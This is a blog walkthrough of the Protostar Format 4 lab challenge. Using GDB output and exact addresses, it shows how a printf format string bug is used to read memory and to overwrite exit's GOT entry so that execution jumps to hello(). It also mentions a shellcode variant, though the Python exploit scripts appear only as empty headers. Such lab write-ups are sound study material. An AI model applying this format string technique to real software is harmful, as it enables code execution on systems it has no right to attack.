Protostar Format 4 Walkthrough

Let’s tackle the Protostar Format 4 challenge from Exploit Exercises (https://exploit-exercises.com/protostar/format4/). This is a detailed step-by-step walkthrough explaining all the tools and techniques needed — we’ll be writing a format string exploit.

Format 4 Challenge

Here’s the source code for the challenge, format4.c:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

The program reads a string from the standard input and passes it to printf. We need to craft a string that will cause a call to hello().

Exploring the Stack

First thing we’ll do is try to explore the stack of the program when printf is called. Let’s open format4 in GDB:

user@protostar:/opt/protostar/bin$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>info registers
>x/1i $eip
>x/32x $esp
>end
(gdb) set pagination off

To start with, I configure some creature comforts so that GDB displays registers, current CPU instruction, and contents of the stack each time a breakpoint is reached (as I finished writing I realized these are not really needed, but I left them here anyways). I explain these in a bit more detail in the Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0. Now let’s run it and play with the input:

(gdb) run
Starting program: /opt/protostar/bin/format4
ABCDEF
ABCDEF

Interesting. If we pass a plain string, we get the same string as output. If we use one of the printf format specifiers, such as %p, printf will interpret it and expect additional parameters. There’s no additional parameters provided, but it will still pick values from the stack and use them. %p tells printf to interpret the next parameter as 4 byte (on 32 bit systems) pointer (i.e. memory address) and print it in hex. We add | as a divider, and also place a pattern AAAA at the beginning of the string that we can easily recognize. It looks like the string we pass to stdin is located on the stack, and so instructing printf to inspect the stack we found it (highlighted). This makes sense, buffer is a local variable in vuln() and so it is located on the stack during execution. See my Stack 7 walkthrough (link above) for more info on stack workings and layout.

Reading Arbitrary Program Memory

OK, let’s start crafting our exploit, and we’ll start with exploring the program memory:

#!/usr/bin/python

Our starting point is the same string we used before. Run the exploit:

user@protostar:~$ ./format4.py >/tmp/f4

Back in GDB:

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70

We see that the beginning of the string can be found on the stack in the fourth “parameter” to printf. Let’s find a string in memory we’d like to display:

(gdb) disas hello
Dump of assembler code for function hello:
0x080484b4 <hello+0>: push ebp
0x080484b5 <hello+1>: mov ebp,esp
0x080484b7 <hello+3>: sub esp,0x18
0x080484ba <hello+6>: mov DWORD PTR [esp],0x80485f0
0x080484c1 <hello+13>: call 0x80483dc <puts@plt>
0x080484c6 <hello+18>: mov DWORD PTR [esp],0x1
0x080484cd <hello+25>: call 0x80483bc <_exit@plt>
End of assembler dump.
(gdb) x/s 0x80485f0
0x80485f0: "code execution redirected! you win"

We see that memory at address 0x80485f0 contains string “code execution redirected! you win”. Let’s trick the program into displaying it! All we need to do is change AAAA to the address of the string and change fourth %p to %s — the address we provide will be interpreted as the location of the NULL terminated string, which will be printed. Here’s the modified exploit:

#!/usr/bin/python

And now run it (run the exploit first and redirect output to /tmp/f4):

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
|0x200|0xb7fd8420|0xbffff5f4|code execution redirected! you win|0x7c70257c|0x257c7025|0x73257c70|0x7c70257c|0x257c7025|0x70257c70

It works!

Modifying Memory With printf

So far so good, but we only learned how to explore the contents of the memory. How is it even possible to hijack execution flow of the program with printf, doesn’t it just print stuff to the standard output? If we check man page for printf (the C function, not a command, i.e. man 3 printf), we find this gem in the BUGS section:

Code  such  as  printf(foo); often indicates a bug, since foo may contain a % character.  If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.

“Write to memory” sounds promising, let’s check what %n does:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument.  No argument is converted.

So, printf(“AAAA%n”, &n_char) will print AAAA to the standard output and then will store 4 in n_char variable. We can pass any memory address instead of &n_char as we control stack through the standard input. Excellent!

Let’s try to write 0x41 to the target variable. Find its memory address first:

(gdb) break main
Breakpoint 10 at 0x804851a: file format4/format4.c, line 27.
(gdb) run
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xd63131a5 -701419099
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xfc66e7b5 0xd63131a5 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4

We see that the value of target is 0 and that it’s located at 0x804973c. Let’s use it:

#!/usr/bin/python

Run it in GDB (remember to run the script first and save it’s output to /tmp/f4):

(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) break *0x0804850f
Breakpoint 11 at 0x804850f: file format4/format4.c, line 22.
(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0x1cbc0fd9 482086873
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0x36ebd9c9 0x1cbc0fd9 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4

We set a second breakpoint in vuln after printf and start the program. At the beginning on main the value of target is 0. After the printf it is 0x54. The good news is we’ve managed to change it. The bad news is, it’s not the expected 0x41. What happened here is that we used the length of the buffer in our calculations, but the printf would output a hex value (like 0xb7fd8420) instead of the %p characters in the string.

This brings us to the first trick we’ll use, which is the parameter field modifier. It allows us to reference subsequent printf arguments, without using the prior arguments: printf(“%4$d”, 1, 2, 3, 4, 5) will print 4. This is just the thing we need to reference the memory address we plant in the stack, without using any of the %p to iterate through the stack values we don’t need. Here’s our modified exploit to overwrite target:

#!/usr/bin/python

And run it in GDB:

(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xdb1dea4c -618796468
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xf14a3c5c 0xdb1dea4c 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4

It works perfectly now.

The second trick we’ll need for this exploit is the “length modifier” for the printf parameters. If we wanted to write, say, 0x0804abcd to some memory address using %n, we would need to print 134,523,853 characters (converted form hex). That’s a lot! But if we use %hn use instead, it tells printf to treat the parameter as short int, i.e. 2 bytes. So instead of doing one write of 0x0804abcd, we can two separate writes of 0x0804 and 0xabcd, for which we would need printf to output 43,981 characters (0xabcd in decimal). Also, we can see that the length of the buffer is 512 bytes, so we cannot just pass a long string to output all of those characters, so we’ll also use field width format string modifier (a number we can put right after %). As an example, printf(“%500d”, 5) will print 499 spaces followed by the number 5 — 500 characters in all.

We also notice that exit() is called right after printf() in vuln(), which would make is useless if we overwrite the return address for vuln. So our third trick would be to overwrite the address for exit() in the Global Offset Table (GOT). This will also make the exploit more reliable as we don’t need to guess the correct location of the return address on the stack. See my Heap 3 walkthrough for more info on GOT: https://medium.com/@airman604/protostar-heap-3-walkthrough-56d9334bcd13

The Exploit

Our plan is clear now, we’ll use the input string to plant the addresses of the higher and lower halfs of the exit pointer in GOT, we’ll print the required number of characters and will use %hn twice to overwrite the address of exit in GOT with the address of hello().

Let’s find all the needed addresses:

(gdb) p hello
$17 = {void (void)} 0x80484b4 <hello>
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) x/3i 0x80483ec
0x80483ec <exit@plt>: jmp DWORD PTR ds:0x8049724
0x80483f2 <exit@plt+6>: push 0x30
0x80483f7 <exit@plt+11>: jmp 0x804837c

So we need to overwrite the memory at 0x08049724 with 0x080484b4. Let’s put it all together:

#!/usr/bin/python

And it works when we run it as:

user@protostar:/opt/protostar/bin$ ~/format4.py | ./format4
&$
<snip>
code execution redirected! you win

Where’s My Shellz?

Without much explanation, here’s a modified exploit that executes a shell. 0xbffff5d0 is approximately the address of all the NOPs (\x90) we add to the buffer and we’re trying to jump to about the middle of the nopsled to get to the shellcode I’ve also added:

#!/usr/bin/python

This should be executed as:

user@protostar:/opt/protostar/bin$ (~/format4_shell.py; cat) | ./format4

For more info on nopsled and the (…; cat) | … trick, see my Stack 7 walkthrough.

References

LiveOverflow Binary Hacking course — https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN

My Protostar Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store